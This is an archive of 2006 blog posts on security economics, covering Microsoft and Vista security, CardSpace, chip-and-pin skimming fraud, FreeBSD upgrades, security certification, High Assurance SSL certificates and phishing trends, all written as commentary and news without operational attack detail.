    3. their efforts to fix these problems are subject to capture by the sales arm. So this is why you are seeing efforts like the above. It's not that the sales arm says "you must make the product sell more Vista..." No, it is more subtle than that. It is as if a thousand helping hands turn up to help if the solution helps Vista sales, and those same thousand hands hold little razors that take little nicks out of you if your solution slows down sales of Vista.

    But even deeper than that, we have the dangers of feedback loops generating perverse solutions. The anti-virus companies had at least the market to keep them honest. They were symbiotes, feeding of the host, like those little fish that follow sharks. The rewards and punishments were fairly clear.

    Microsoft will not have the market to keep itself honest: it is the market for the OS, it is the owner of the user's computer, it owns the mess, and it is now the fixer of the mess. That's not to say that they won't get it right, but that there is no negative feedback force in this "I'm my own symbiote" market to stop perverse solutions and kill them before they do too much damage.. And there are positive feedback forces, as listed above.

    Not to mention brittle. These complicated systems could result in quite serious DOS attacks. Seen on Risks / slashdot:

    An anonymous Slashdot user gives virus writers a worrying idea: "A virus could use one of the 'Product-Key Changer' scripts ... to install a pirated product key on every infected computer (wiping all traces of the original key). This would render millions of genuine installations indistinguishable from pirated installations. What a mess for Microsoft! They would have to immediately 'kill forever' the WGA helper, and maybe even remove the WGA check on Windows Update. Such a virus would be a hard lesson to learn for the writers of all kinds of automated 'genuine' checks."

    What about Vista? Well, the signs are that Vista is constructed along the same lines. Same thinking, same techniques. So at the same time as Microsoft are swallowing the little cleaner fish in the old XP market, they are bringing out a new shark with no cleaning fish.

    If I was responsible for a doze network, I'd be terrified of being the first penguin. I'd really want some other penguin over on the other side of town to play with the shark for a year or so.

    Mike Nash, who was security czar over at Microsoft for the period of the Vista development now steps aside, and here's what incoming Ben Fathi says when probed on the future (which is post Vista):

    Q: Is there's anything that you can tell us about what's on the horizon when it comes to security at Microsoft.

    We are concentrating on what Bill Gates talked about in February at the RSA Conference. There are four areas to our security vision: a trust ecosystem; engineering for security; simplicity; and fundamentally secure platforms. We have done a lot of investments in all of those areas, and I'm going to continue those investments.

    Look at, for example, the trust ecosystem, the first step in that was delivering Active Directory Federation Services in Window Server 2003 R2. The next step, and we've done some of this in Vista, is adding things like certificate lifecycle management, so enterprises can manage digital certificates. InfoCard is also an example.

    In terms of engineering for security, that's all about the Security Development Lifecycle. It applies to all of our products, not just Windows, obviously. But what we're finding is that we need to make the SDL (Security Development Lifecycle) more agile with things like MSN and Windows Live having very short development cycles and needing quick updating.

    Well, at least Microsoft has a Security Czar - many organisations do not. And, he's been brave (foolhardy?) enough to state what he's aiming for:

    Finally, a fundamentally secured platform, that's the part I feel I will be reviewed on. It is about taking a lot of our investments in the platform itself and Windows and improving them.

    I think I predicted a while back that Microsoft would have to adopt another OS in order to save their security situation. Like Apple did. Microsoft are also betting big on CardSpace (was InfoCard) saving their security bacon. I wrote long and probably scathingly about that a few months back. Here's some more skepticism:

    Microsoft is emphasizing the ease of adoption for CardSpace, which is a nice way of saying that they're begging developers to get involved. For a proof of concept project, says Turner, all it takes to use the technology is to embed a bit of XML in your Web site, and to update the sign-in page. A three-line code change is all that's necessary to change from self-issued to managed infocards.

    And, they stress, all this can be done with non-Microsoft technologies, including Java and Linux. "The only Microsoft bit here is Infocard," said Turner.

    CardSafe will be built into Windows Vista, and will be available for Windows XP and Windows Server 2003, the company says. (Betas and CTPs are available here.) According to Turner, Microsoft is pushing for a CardSafe RTM (Release to Manufacturing) "in just a few months."

    For CardSafe to succeed, it will need buy-in from more than site developers. The company is exhorting financial firms and other such organizations — pleading might be a better word — to participate in the managed card program as Indentity Providers.

    It's probably fair to guess that companies are not going to sign up with gay abandon like they did with the last lot. It's also a no-brainer that anyone who suggests that it only takes a three-line code change in a website is someone who's never actually done it. And allowing Microsoft to manage the Identity that closely is not something that financial providers are going to be comfortable with.

    Unfortunately, the bottom line is that it doesn't actually solve the problem we are currently looking at. The emerging threat is one of authorisation, not authentication -- Identity is the wrong problem. So unless CardSpace can address authorisation in some compelling way, it's back to the old game of rolling out those SecureId tokens and discovering that the attacker bypasses them as well. That's not out of the question, but given the complexity of understanding what all that means, I don't have high hopes.

    So my call for the moment - CardSpace is version 3 of this story, and the only benefit will be if it takes Microsoft closer to version 4.

    But given the number of cards they have stacked up in their hands at the moment, CardSpace could be overwhelmed even if it does work out. Unfortunately for Microsoft, others are waiting, this time, and they've had their 3 years of re-write opportunity.

    Posted by iang at 12:47 PM | Comments (3) | TrackBack

    June 10, 2006

    Naked Payments III - the well-dressed bank

    Bigmac writes: The next levels in scams (sorry, it's in single Dutch, translations welcome):

    A very well setup advance fee scam where they not only had a fake ING website but actually two complete ING offices, next to real ING offices; one on schiphol, one close to the old headquarters (? don't know where).

    Did you hear the one about the fake NEC factory in Taiwan? They just pretended to be NEC but actually sold product, did R&D, everything.

    (The fake NEC factory was written up on Bruce Schneier's blog, I'll chase the link when I get back. Back in times long past, the Japanese went one better - they named a region Usa so they could stamp "MADE IN USA" on their packages. Life goes on in the IP theft department...)

    Posted by iang at 09:14 PM | Comments (1) | TrackBack

    May 26, 2006

    How much is all my email worth?

    I have a research question. How much is all my email worth? As a risk / threat / management question.

    Of course, that's a difficult thing to price. Normally we would price a thing by checking the market for the thing. So what market deals with such things?

    We could look at the various black markets but they are more focussed on specific things not massive data. Sorry, bad guys, not your day.

    Alternatively, let's look at the US data brokers market. There, lots and lots of data is shared without necessarily concentrating on tiny pickings like credit theft identifiers. (Some of it you might know about, and you may even be rewarded for some of it. Much is just plain stolen out of sight. But that's not today's question.) So how much would one of those data broker's pay for *full* access to my mailbox?

    Let's assume I'm a standard boring rich country middle class worker bee.

    Another way to look at this is to look at google. It makes most of the money in advertising, and it does this on the tiny hook of your search query. It is also experimenting with "catalogue your hard drive" products (as with Apple's spotlight and no doubt Microsoft and Yahoo are hyperventilating over this already). So it must have a view as to the value of *everything*.

    So, what would it be worth to those companies to *sell* the entire monitoring contents of my email, etc, for a year to Yahoo, Google, Microsoft, or Apple? Imagine a market where instead of credit card offers to my dog clogging up mailbox, I get data sharing agreements from the big friendly net media conglomerates.

    Sponsored Link
    Google Head Specials
    www.google.com/headspecials
    Failing to nail your hammer?   Your marketing seems like all thumbs?
    Try Google's get-in-his-head program.
    Today's only, Iang's emails, buy one, get two free.


    Does anyone know any data brokers? Does anyone have hooks into google that can estimate this?

    Posted by iang at 06:43 AM | Comments (6) | TrackBack

    May 22, 2006

    It is no longer acceptable to be complex

    Great things going on over at FreeBSD. Last month was the surprising news that Java was now distro'd in binary form. Heavens, we might actually see Java move from "write once, run twice" to numbers requiring more than 2 bits, in our lifetimes. (I haven't tried it yet. I've got other things to do.)

    More serious is the ongoing soap opera of security. I mean over all platforms, in general. FreeBSD still screams in my rankings (sorry, unpublished, unless someone blogs the secret link again, darnit) as #2, a nose behind OpenBSD for the top dog spot in the race for hard core security. Here's the story.

    Someone cunning (Colin?) noticed that a real problem existed in the FreeBSD world - nobody bothers to update, and that includes critical security patches. That's right. We all sit on our haunches and re-install or put it off for 6-12 months at a time. Why?

    Welll, why's a tricky word, but I have to hand it to the FreeBSD community - if there is one place where we can find out, that's where it is. Colin Percival, security czar and general good sort, decided to punch out a survey and ask the users why? Or, Why not? We haven't seen the results of the survey, but something already happened:

    Polite, professional, thoughtful debate.

    No, really! It's unheard of on an Internet security forum to see such reasoned, considered discussion. At least, I've never seen it before, I'm still gobsmacked, and searching for my politeness book, long lost under the 30 volume set of Internet Flames for Champions, and Trollers Almanacs going back 6 generations.

    A couple of (other) things came out. The big message was that the upgrade process was either too unknown, too complex, too dangerous, or just too scary. So there's a big project for FreeBSD sitting right there - as if they need another. Actually this project has been underway for some time, it's what Colin has been working on, so to say this is unrecognised is to short change the good work done so far.

    But this one's important. Another thing that delicately poked its nose above the waterline was the contrast between the professional sysadmin and the busy other guy. A lot of people are using FreeBSD who are not professional sysadmins. These people haven't time to explore the arcania of the latest tool's options. These people are impressed by Apple's upgrade process - a window pops up and asks if it's a good time, please, pretty please? These people not only manage a FreeBSD platform or 10, but they also negotiate contracts, drive buses, organise logistics, program big apps for big iron, solve disputes with unions and run recruiting camps. A.k.a., business people. And in their lunchbreaks, they tweak the FreeBSD platforms. Standing up, mouth full.

    In short, they are gifted part-timers. Or, like me, trained in another lifetime. And we haven't the time.

    So it is no longer - I suggest - acceptable for the process of upgrades and installs to be seriously technical. Simplification is called for. The product is now in too many places, too many skill sets and too many critical applications to demand a tame, trained sysadmin full time, right time.

    Old hands will say - that's the product. It's built for the expert. Security comes at a cost.

    Well, sort of - in this case, FreeBSD is hoisted on its own petard. Security comes at a risk-management cost. FreeBSD happens to give the best compromise for the security minded practitioner. I know I can install my machine, not do a darn thing for 6 months, and still be secure. That's so valuable, I won't even bother to install Linux, let alone look up the spelling of whatever thing the Microsoft circus are pushing this month. I install FreeBSD because I get the best security bang for buck: No necessary work, and all the apps I can use.

    Which brings us to another thing that popped out of the discussion - every one of the people who commented was using risk management. Seriously! Everyone was calculating their risk of compromise versus work put in. There is no way you would see that elsewhere - where the stark choice is either "you get what you're given, you lucky lucky microsoft victim" all the way across to the more colourful but unprintable "you will be **&#$&# secure if you dare *@$*@^# utter the *#&$*#& OpenBSD install disk near your (*&@*@! machine in vein."

    Not so on FreeBSD. Everyone installs, and takes on their risks. Then politely turns around and suggests how it would be nice to improve the upgrade process, so we can ... upgrade more frequently than those big anniversaries.

    Posted by iang at 05:38 PM | Comments (5) | TrackBack

    May 16, 2006

    Freshfaced risks: Licensed to Secure, 007 seconds out of College, a Risky Future indeed!

    Stanley Quayle on Risks raises the possibility that computer security work may require a licence:

    > Some computer professionals will need to get a Private Investigator license > just to continue doing their computer work.

    The Ohio law requires this already:

    The business of private investigation is [...] determine the cause of or
    responsibility for [...] damage to property, or to secure evidence for use
    in any legislative, administrative, or judicial investigation or
    proceeding.

    > I imagine this will also apply to accountants and auditors

    The law exempts, among other groups, lawyers and accountants.

    > We will have to be asking suppliers of firewall, anti-virus, anti-spam,
    > anti-spyware etc. if they have a PI license

    Ohio law also exempts licensed professional engineers. Ask your supplier if
    they employ professional engineers -- after all, your software should follow
    sound engineering principles.

    My signature line includes "P.E.", which stands for Professional Engineer.
    Now I know why I got my license...

    (The source is a bit obscured above, I don't have the original.)

    I said earlier that Security is the market for silver bullets. Michael Spence says they pack silver bullets in Education. So if we look at the market for Security Education, we'd be surely loaded for vampire, right?

    Now, CISSPs can be had at (US) college - just by doing some extra classes.

    This fall, Peirce College will join Florida's St. Petersburg College as the second school offering classes tied to the domains of knowledge for both the CISSP and the Systems Security Certified Practitioner (SSCP). Combined with other college courses, a student can not only enter the workforce with either an associate's or bachelor's degree, but also having passed one of the International Information Systems Security Certification Consortium's exams. Due to experience requirements for both certifications, the candidate does not actually get the CISSP or SSCP designation until the experience has been obtained. This program will not be unique to these two schools, as the ISC(2) hopes to sign up as many as 100 colleges to offer its courses.

    007 seconds out the door, students are licensed to secure, but only as Associates.

    The good side to this run of bad news is that maybe this will be the nudge we need to get rid of the plague of security experts. First we flood the market with Junior CISSPs, Associate Black Hats, Lieutenant Hackers, PenTesters in Training, ... then we license them all? Then round them up, brand them and ship 'em off to the camps! Yeah! Cisspocide!

    It's a natural progression from a truly disastrous year for security. E.g., convictions for due diligence, large companies being allowed to run rootkits without fear of prosecution, anti-virus companies not picking up said rootkits, security companies pricing exploit data to the highest bidder, a progression of laws on this and that, and that's only the headlines.... In the face of that, licensing and inexperienced security certifications are quite benign.

    With all this, we might as well abandon the very word. Yet, what's a poor hacker to do? Chandler Howell, stalwart defender of risk management, rides to the rescue with the very definitions:

    Short Form: Information Security locks up information to keep it safe, whether or not that’s the best thing to do with it. *Information Risk Managers* figure out the best way to preserve the value of the information, which may or may not include locking it up.

    Go Chandler! Can we hold the line on risk management? Or is it only another decade or so before we need to be licensed to understand and manage our own risks? And we're all back to college to read books entitled "The SOX way to Risk-free management and fast retirement?"

    Who knows, but let's close with his Slightly Longer Form:

    Information Security is the practice of designing and implementing countermeasures and other preventative (usually technical) controls on information. Security experts tend to understand the nuances of their tools, but all-too-often fall prey to the adage that, “When your only tool is a hammer, ever problem begins to look a lot like a nail.”

    Information Risk Management (IRM) is the practice of determining which Information Assets need protection and what level of protection is required, then determining appropriate methods of achieving that level of protection by understanding the applicable vulnerabilities, threats and countermeasures.

    To practice IRM successfully means understanding not just the technologies that enable communication but also the business that the communication enables, the applicable regulatory environment, how information is utilized, the circumstances under which it might have value to an attacker, and how to balance those variables based on the risk appetite and cost-consciousness of the business.

    Posted by iang at 04:57 AM | Comments (1) | TrackBack

    May 10, 2006

    JIBC April 2006 - "Security Revisionism"

    The April edition of J. Internet Banking and Commerce is out and includes an essay on "Security Revisionism" that addresses outstanding questions from an economics pov:

    Security isn't working, and some of us are turning to economics to address why this is so. Agency theory casts light on cases such as Choicepoint and Lopez . An economics approach also sheds light on what security really is, and social scientists may be able to help us build it. Institutional economics suggests that the very lack of information may lead to results that only appear to speak of security.

    Other than my opinions (and others), here's the full list:

    General and Review Articles



    Research Papers


    Posted by iang at 06:16 AM | Comments (4) | TrackBack

    May 09, 2006

    Chip-and-Pin terminals were replaced by "repairworkers" ?

    In comments to the chip-and-pin fraud story, Lynn points to:

    Chip and pin hack exposed

    According to our source, a team of shysters has been turning up at petrol stations posing as engineers and taking the Trintech Smart5000 Chip and Pin units away for repair. They have then bypassed the anti-tamper mechanisms and inserted their own card skimmer.

    ... snip ...

    this is also could be considered from the angle of my old security proportional to risk theme

    That might explain all the arrests, as they could have gone and examined the videos to see who the repairmen actually were.

    The attack on the merchant terminals reminds me of the old one-way-triangle chipmoney designs. They used in general a diversified key arrangment so if you cracked a user card then you could only duplicate that one card. This threat was addressed by blacklisting within the system (there were all sorts of secret instructions and capabilities in these chip money products, some of which got them into hot water from time to time because of the secrecy).

    So, with the diversified key design, the limitation was that the upstream merchant card had to hold the full key, only the downstream user card would hold the diversified key. (Think of it as k and H(k). One can prove the other, but not the other prove the one.)

    Which simply shifts the burden of the attack to the merchant, so the merchant in theory had to secure the card his device more carefully than a user card. I pointed this out on occasion, but it was not considered a grave risk, mostly because I suspect it was actually a shifting the burden pattern, a la Senge. That is, cognitively, the story had an answer, and going the extra distance to analyse the new story was beyond saturation point.

    This is apparently the device, Trintech:

    The Smart 5000 PED

    The Smart 5000 is based on an ARM7 processor, with MMU (memory management unit). It boots a 2.4 series embedded Linux kernel from 4MB of Flash (8MB optionally available). The device includes 16MB of SDRAM, and 512K of SRAM.

    Trintech's Smart 5000 PIN entry device

    Standard I/O ports include an RS-232 serial port, and USB. Optional ports include PSTN (public switched telephone network), ISDN (integrated service digital network), and IP/LAN (Ethernet).

    The Smart 5000 includes an 8-line, 132 x 64 pixel backlit graphics display, along with 15 keys and 6 programmable keys. It also contains an EMV L1 certified chip card reader; a Track 1, 2, & 3 magswipe reader; and 3 additional SIM/SAM readers.

    The Smart 500 measure 8 x 4.3 x 4.7 inches (205 x 110 x 120 mm).

    Trintech's Linux-based Smart 5000 PED received certification by Visa as a secure PED in October, 2003. The device also sports certified encryption capabilities for DES, 3DES, RSA (2048-bit key length), with countermeasures agains DPA, DFA, an DTA. It also supports SHA1 and KUKPT.

    Posted by iang at 05:40 AM | Comments (7) | TrackBack

    May 06, 2006

    Petrol firm suspends chip-and-pin

    Lynn points to BBC on: Petrol giant Shell has suspended chip-and-pin payments in 600 UK petrol stations after more than £1m was siphoned out of customers' accounts. Eight people, including one from Guildford, Surrey and another from Portsmouth, Hants, have been arrested in connection with the fraud inquiry.

    The Association of Payment Clearing Services (Apacs) said the fraud related to just one petrol chain. Shell said it hoped to restore the chip-and-pin service before Monday.

    "These Pin pads are supposed to be tamper resistant, they are supposed to shut down, so that has obviously failed," said Apacs spokeswoman Sandra Quinn. Shell has nearly 1,000 outlets in the UK, 400 of which are run by franchisees who will continue to use chip-and-pin.

    A Shell spokeswoman said: "We have temporarily suspended chip and pin availability in our UK company-owned service stations. This is a precautionary measure to protect the security of our customers' transactions. You can still pay for your fuel, goods or services with your card by swipe and signature. We will reintroduce chip and pin as soon as it is possible, following consultation with the terminal manufacturer, card companies and the relevant authorities."

    BP is also looking into card fraud at petrol stations in Worcestershire but it is not known if this is connected to chip-and-pin.

    And immediately followed by more details in this article: Customers across the country have had their credit and debit card details copied by fraudsters, and then money withdrawn from their accounts. More than £1 million has been siphoned off by the fraudsters, and an investigation by the Metropolitan Police's Cheque and Plastic Crime Unit is under way.

    The association's spokeswoman Sandra Quinn said: "They have used an old style skimming device. They are skimming the card, copying the magnetic details - there is no new fraud here. They have managed to tamper with the pin pads. These pads are supposed to be tamper resistant, they are supposed to shut down, so that has obviously failed."

    Ms Quinn said the fraud related to one petrol chain: "This is a specific issue for Shell and their supplier to sort out. We are confident that this is not a systemic issue."

    Such issues have been discussed before.

    Posted by iang at 10:08 AM | Comments (11) | TrackBack

    April 19, 2006

    Numbers on British Fraud and Debt

    A list of numbers on fraud, allegedly from The Times (also) repeated here FTR (for the record).

    INTERNET CHATROOM PRICE LIST

    Regular credit card number: $1
    Credit card with 3-digit security code: $3-$5
    Credit card with code and PIN: $10-$100
    Social security number (US): $5-$10
    Mother's maiden name: $5-$10
    THE BIG NUMBERS
    £56.4 ($100) billion:Total amount owed on British credit cards
    141.1 million:Number of credit, debit and charge cards in Britain
    1.9 billion:Number of purchases on credit and charge cards in Britain a year
    £123 billion:Total value of credit and charge card purchases a year
    5:Number of credit, debit and charge cards held by 1 in 10 consumers
    £58:Average value of a purchase on a credit card
    £41:Average value of a debit card purchase
    88 percent:Proportion of applicants who have been issued with a credit card without providing proof of income
    £504.8 ($895) million:Total plastic-card fraud losses on British cards a year
    £1.3 ($2.3) million:Amount of fraud committed against cards each day
    7:Number of seconds between instances of fraud
    £696 ($1,235):Average size of fraud, 2004

    (Printing them in USD is odd, but there you go... I've preferred the Times' UKP amounts above, as there were a number of mismatches.)

    Posted by iang at 10:01 AM | Comments (2) | TrackBack

    April 18, 2006

    Security Gymnastics - Risk-based from RSA, security model rebuilding from MS, and taking revocation to the next level?

    RSASecurity is now pushing a thing called Adaptive Authentication

    The risk-based authentication module is a behind-the-scenes technology that is designed to score the level of risk associated with a given activity or transaction—like account logon, bill payment or wire transfer—in real time. If that activity exceeds a predetermined risk threshold the user is prompted for an additional authentication credential to validate his or her identity. ...

    One-time password authentication offers tangible, time-honored security for the segments of your user base who routinely engage in sufficiently risky activities or who feel better protected by physical security and will reward your institution for providing this through consolidation of assets increased willingness to transaction online.

    It's hard to find a pithy statement of reliability amongst the hypeware, but basically this seems to be offering a choice of authorisation methods, based on the risk. The essence here is four-fold: we are now seeing the penny drop for suppliers: security is proportional to risk. Secondly, note the per-transaction emphasis. RSASecurity are half way to a real solution to the meccano / MITB threat, but given their current line up of product, they are stuck for the time being. Thirdly, this confirms the Cyota trend spotted before. That's smart of them.

    Finally, recall the security model that we all now dare not mention (#11). It's war with Eurasia, as always. Further hints of this have been revealed over at emergent chaos, where Adam comments on Infocard:

    For me, the useful sentence is that 'Infocard is software that packages up identity assertions, gets them signed by a identity authority and sends them off to a relying party in an XML format. The identity authority can be itself, and the XML is SAML, or an extension thereof, and the XML is signed and encrypted.'

    Spot it? As reported earlier, Microsoft is moving to put Infocard in place of any prior security model that might have existed (whatever its unname) and as we now are rebuilding the security model from scratch, it makes sense to ... have the user issue her own credentials as that will build user-base support. Oh-la-la! I wonder if they are going to patent that idea?

    Over at the NIST conference on PKI, they had lots of talks on trust (!), revocation (!) and sessions on Digital Signatures (!) and also Browser Security (!). I wish I'd been there. I skimmed through the PPT for the Invited Talk - Enabling Revocation for Billions of Consumers (ppt) by Kelvin Yiu, Microsoft, for any correlations to the above (I found none).

    But I did find that IE7 will have revocation enabled by default. What this means in terms of CRL and OCSP checking is unclear but one curious section entitled "Taking Revocation to the Next Level" described (sit down before reading this) a fix in TLS that will enable the web server to cache and deliver the OCSP request for an update pre-fetched to the browser. All in TLS. Apparently, this act of security gymnastics is called "stapling":

    Revocation in Windows Vista

    How TLS "Stapling" Scales

  • Contoso returns its certificate chain and the OCSP response in the TLS handshake

  • Stapling reduces load on the CA to # of servers, not clients
  • I kid you not. According to Microsoft, revocation is to be bundled in TLS - although I would like people to check those slides because I have a sneaking suspicion that NeoOffice wasn't displaying all the content. Anyone from the TLS side care to correct? Please?

    Posted by iang at 02:46 PM | Comments (2) | TrackBack

    March 30, 2006

    Professional Associations in IT Security

    Someone wrote to me to ask:

    Are you aware of any professional associations for IT security you could recommend I become a member of?

    I have no answer there - would anyone any recommend an association? And more importantly, why?

    Posted by iang at 10:45 AM | Comments (7) | TrackBack

    March 07, 2006

    FraudWatch - Chip&Pin, a new tenner (USD10)

    Chip&Pin in Britain measured a nearly full year of implementation (since February) and found fraud had dropped by 13%. They say that's good. Well, it's not bad but it is a far cry from the 80% figures that I recall being touted when they were pushing it through.

    The Chip and Pin system cut plastic card fraud by 13% in 2005, according to the Association of Payment Clearing Services (Apacs). Losses due to the fraudulent use of credit and debit cards fell last year by £65m to £439m.

    Most categories of fraudulent card use dropped, except for transactions over the phone, internet or by mail. Chip and Pin cards were introduced in 2004, with their use becoming required in shops from February this year.

    The new type of card appears to have brought a decisive turnaround with fraud levels now back to the levels last seen in 2003. In 2004, as the new cards were being introduced, card fraud continued to shoot up, by 20%, costing banks and retailers more than half a billion pounds.

    Sandra Quinn of Apacs hailed the impact of Chip and Pin, which has been rolled out to most of the UK retailing and banking industries since October 2003:

    "Seeing card fraud losses come down is cast-iron proof that Chip and Pin is doing its job. Back in 2002 we forecast that fraud would have risen to £800m in 2005 if we didn't make the move to Chip and Pin so it's heartening to see total losses well beneath this figure" she said.

    So maybe if we factor in such a prediction of 800m, down now to 439, we are seeing a drop of 45%. I'd say that according to GP they moved too late and ended up with an institutionalised fraud at a high and economic level. Clawing that back is going to take some doing.

    And, also from PaymentNews, the US mint continues its sly dance to use other colours than green:

    Security Features
    The redesigned $10 note also retains three of the most important security features that were first introduced in the 1990s and are easy to check: color-shifting ink, watermark and security thread.

    Color-Shifting Ink: Tilt your ten to check that the numeral "10" in the lower right-hand corner on the face of the note changes color from copper to green. The color shift is more dramatic on the redesigned notes, making it even easier for people to check their money.

    Watermark: Hold your ten up to the light to see if a faint image of Treasury Secretary Alexander Hamilton appears to the right of his large portrait. It can be seen from both sides of the note. On the redesigned $10 note, a blank oval has been incorporated into the design to highlight the watermark's location.

    Security Thread: Hold your ten up to the light and make sure there's a small strip embedded in the paper. The words "USA TEN" and a small flag are visible in tiny print. It runs vertically to the right of the portrait and can be seen from both sides of the note. This thread glows orange when held under ultraviolet light.

    To protect our economy and your hard-earned money, the U.S. government expects to redesign its currency every seven to ten years.

    Everything is good fun about that page, even the URL!

    Posted by iang at 05:10 AM | Comments (16) | TrackBack

    February 21, 2006

    Major Browsers and CAs announce Balkanisation of Internet Security

    GeoTrust, recently in trouble for being phished over SSL, has rushed to press a defensive PR that announces their support for high assurance SSL certificates. As it reveals a few details on this programme, it's worth a look:

    The new High Assurance SSL certificate standard, which is being defined by leading browser companies including Microsoft, Mozilla and Opera, in partnership with Certificate Authorities including GeoTrust and VeriSign, as well as the American Bar Association Information Security Committee, will entail a higher level of business verification than any Certificate Authority's current vetting methods. Additionally, High Assurance SSL certificate identity information will be clearly displayed in the new-generation browsers, so that consumers will easily be able to discern that they are indeed at the site they think they are, and not a fraudulent version of a popular website.
    ...

    The new specification for verifying identities for the new High Assurance SSL certificate is expected to be finalized in the coming months. The vetting process will be much more comprehensive than any Certification Authority's current vetting standards, which primarily rely on email and faxed information, database lookups and phone calls before issuing an SSL certificate. Today, these processes vary from Certificate Authority to Certificate Authority, and encompass an array of manual and automated processes. Key to the new High Assurance certificates is a standardized process across Certificate Authorities for verifying information that will include: verifying the organization's identity; verifying that the would-be purchaser has the legal authority to make the SSL certificate request for that organizational entity; and confirming that the entity is a legitimate business, not a shell or false front entity.

    OK, what can we learn from that? The browser manufacturers and the CAs have teamed up. Mozilla and Opera are being teased out of the closet. The specification has not been completed, but the "speed" of the phishing onslaught is overtaking the measured response of the ones that know better.

    My own view of this is that it won't work out as well as the champions are yelling it will. Primarily, it will simply shift the traffic to other areas, until a new balance is reached. In some sense this could be ludicrous, as salesmen run around following phishing victims to sell them HA certs. In other senses, the sense of strategic gameplay for those who know is just too amusing for words. In yet other senses, it proves the branding model, and proves the liability model. Unforeseen consequences in spades.

    When the new balance is reached, the High Assurance will be Highly Breached, just like the GeoTrust cert of last week. That doesn't mean that this won't do some good - it surely will. But with that good comes a huge price tag, and frankly, it looks like it is not worth the price that user sites will have to pay. Especially in comparison to the better and cheaper solutions that have been designed and developed over the 2-3 years since this was first proposed.

    A Microsoft Internet Explorer developer's weblog has published extensively on the new security features in IE 7, the work of the browser and Certificate Authority initiatives, and includes examples of how the new High Assurance SSL certificate information would display within the new Internet Explorer browser.

    Chris Bailey, GeoTrust's chief technical officer stated: "For over a year, a dozen companies have been meeting to find new ways to address the issue of phishing and restore consumer confidence in online transactions. The result is that we will have one standard, with a thoroughly defined vetting process, for the issuance of High Assurance SSL certificates. While not every site will require them, it is our view that financial institutions and large e-tailers will want to convey this added assurance to their customers.

    Yet more concerning is the introduction of a standardised process across CAs that will dramatically increase the cost of these certs. A dozen of them have been meeting for a year! So all this spells bad news for smaller browsers and smaller CAs, who have been excluded from the meetings and are presumably going to be pushed to implement a standard they have no control over, after everyone else has done so. Or not as the case may be.

    Posted by iang at 07:05 PM | Comments (1) | TrackBack

    February 19, 2006

    Branded Experiments

    Adam writes that he walks into a hotel and gets hit with a security brand.

    For quite some time, Ian Grigg has been calling for security branding for certificate authorities. When making a reservation for a Joie de Vivre hotel, I got the attached Javascript pop-up. (You reach it before the providing a credit card number.)

    I am FORCED to ask, HOWEVER , what the average consumer is supposed to make of this? ("I can make a hat, and a boat...") Who is this VERISIGN, and why might I care?

    Well, precisely! They are no-one, says the average consumer, so anything they have done to date, including the above, is irrelevant.

    More prophetically, one has to think of how brand works when it works - every brand has to go through a tough period where it braves the skeptics. Some of the old-timers might recall rolling around the floor laughing at those silly logos that Intel were putting in other supplier's adverts! And stickers on laptops - hilarious !

    These guys will have to do that, too, if things are to this way pass. It will involve lots of people saying "so what?" until one day, those very same skeptics will say "Verisign... now I know."

    The word Verisign isn't a link. It's not strongly tied to what I'm seeing. (Except for the small matter of legality, I could make this site pop up that exact same dialog box.) It is eminently forgeable, there's no URL, there's nothing graphical.

    Right, so literally the only thing going on here is a bit of branding. The brand itself is not being used as part of a security statement in any sense worthy of attention. To recap, the statement we are looking for is something like "Comodo says that the certificate belongs to XYZ.com." That's a specific, verifiable and reliable statement. What you're seeing on the ihotelier page is a bit of fluff.

    Nevertheless, it probably pre-sages such dialog boxes popping up next to the colored URL bar, and confusing the message they're trying to send.

    I guess it presages a lot of bad experimentation, sure. What should he happening in the coloured URL bar is simply that "CAcert claims that Secure.com is who you are connected to." It's very simple. a. the remote party, b. the CA, and c. the statement that the CA says the remote party is who it is. Oh, and I almost forgot: d. on the chrome so no forgeries, thanks, Mr Browser.

    Why does all this matter? To close the loop. Right now, Firefox says you are connected to Paypal.com. And IE6 says you are connected to BoA. If you get phished, it's the browser that got it wrong, not the CA. As the CA is the one that collected the money for securing the connection we need to reinsert the CA into the statement.

    So when the user sues, she does so on the proper design of the PKI, not some mushed up historical accident.

    Posted by iang at 01:45 PM | Comments (1) | TrackBack

    More dots than you or I can understand (Internet Threat Level is Systemic)

    fm points to Gadi Evron who writes an impassioned plea for openness in security. Why? He makes a case that we don't know the half of what the bad guys are up to. His message goes something like this:

    DDoS -> recursive DNS -> Fast Flux -> C2 Servers -> rendevous in cryptographic domainname space -> bots -> Phishing

    Connecting the dots is a current fad in america, and I really enjoyed those above. I just wish I knew what even half of them meant. Evron's message is that there are plenty of dots for us all to connect, so many that the tedium of imminent solution is not an issue. He attempted to describe them a bit later with his commentary on the recent SSL phishing news:

    Some new disturbing phishing trends from the past year:

    POST information in the mail message
    That means that the user fills his or her data in the HTML email message itself, which then sends the information to a legit-looking site. The problem with that, is how do you convince an ISP that a real (compromised) site is indeed a phishing site, if there is no phishy-looking page there, but rather a script hiding somewhere?

    Trojan horses
    This is an increasing problem. People get infected with these bots, zombies or whatever else you’d like to call them and then start sending out the phishing spam, while alternating the IP address of the phishing server, which brings us to…

    Fast-Flux
    Fast Flux is a term coined in the anti spam world to describe such Trojan horses’ activity. The DNS RR leading to the phishing server keeps changing, with a new IP address (or 10) every 10 minutes to a day. Trying to keep up and eliminate these sites before they move again is frustrating and problematic, making the bottle-neck the DNS RR which needs to be nuked.

    We may be able to follow that, but the bigger question is how to cope with it. Even if you can follow the description, dealing with all three of the above is going to stretch any skilled practitioner. And that's Evron's point:

    What am I trying to say here?

    All these activities are related, and therefore better coordination needs to be done much like we do on the DA and MWP groups, cross-industry and open-minded. R&D to back up operations is critical, as what’s good for today may be harmful tomorrow (killing C&C’s as an example).

    The industry needs to get off its high tree and see the light. There are good people who never heard about BGP but eat Trojans (sounds bad) for breakfast, and others need to see that just because some don’t know how to read binary code doesn’t mean they are not amazingly skilled and clued with how the network runs.

    This is not my research alone. I can only take credit for seeing the macro image and helping to connect the dots, as well as facilitate cooperation across our industry. Still, as much as many of this needs to remain quiet and done in secret-hand-shake clubs, a lot of this needs to get public and get public attention.

    Over-compartmentalizing and over-secrecy hurts us too, not just the US military. If we deal in secret only with what needs to be dealt in secret, people may actually keep that secret better, and more resources can be applied to deal with it.
    Some things are handled better when they are public, as obviously the bad guys already know about them and share them quite regularly. “Like candy” when it comes to malware samples, as an example.

    The Internet threat level is now systemic, and has been since the arisal of industrialised phishing, IMO. I've written many times before about the secrecy of the browser sector in dealing with phishing, and how the professional cryptographic community washed its hands of the problem. Microsoft's legendary castles of policy need no reminder, and it's not as if Apple, Sun, Symantec, Verisign or any other security company would ever do any better in measures of openness.

